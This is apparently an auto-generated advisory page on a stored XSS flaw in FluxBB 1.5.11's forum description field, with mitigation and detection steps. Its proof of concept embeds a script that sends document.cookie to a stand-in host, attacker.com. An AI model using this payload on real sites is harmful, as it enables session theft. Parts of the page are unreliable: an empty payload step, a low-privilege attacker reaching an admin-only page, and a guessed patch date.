FluxBB 1511, Cross-Site Scripting (XSS), CVE-2025-44110 (Medium)

Listen to this Post

FluxBB 1.5.11 suffers from a stored Cross-Site Scripting (XSS) vulnerability in the Forum Description Field within admin_forums.php. The flaw arises due to insufficient input sanitization, allowing attackers to inject malicious JavaScript payloads. When an administrator views the forum settings, the script executes in their browser, potentially leading to session hijacking, defacement, or privilege escalation. The attack requires admin-level interaction, reducing its severity but still posing risks in multi-user environments.

DailyCVE Form

Platform: FluxBB
Version: 1.5.11
Vulnerability: Stored XSS
Severity: Medium
Date: 06/12/2025

Prediction: Patch expected by 07/20/2025

What Undercode Say:

Exploitation:

1. Attacker logs in with low-privilege account.

2. Submits a crafted forum description with ``.

3. Admin views forum settings, triggering payload execution.

Proof of Concept (PoC):


<form action="/admin_forums.php" method="POST">
<input type="hidden" name="forum_desc" value="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>">
</form>

Mitigation:

1. Patch: Apply input sanitization:

$forum_desc = htmlspecialchars($_POST['forum_desc'], ENT_QUOTES, 'UTF-8');

2. Temporary Fix: Disable forum description editing via .htaccess:

<Files "admin_forums.php">
Deny from all
</Files>

Detection:

Use grep to scan for vulnerable code:

grep -r "forum_desc" /var/www/fluxbb/admin/

Analytics:

  • CVSS: 6.1 (Medium)
  • Attack Vector: Network
  • Privileges Required: Low
  • User Interaction: Required

References:

End of Report.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top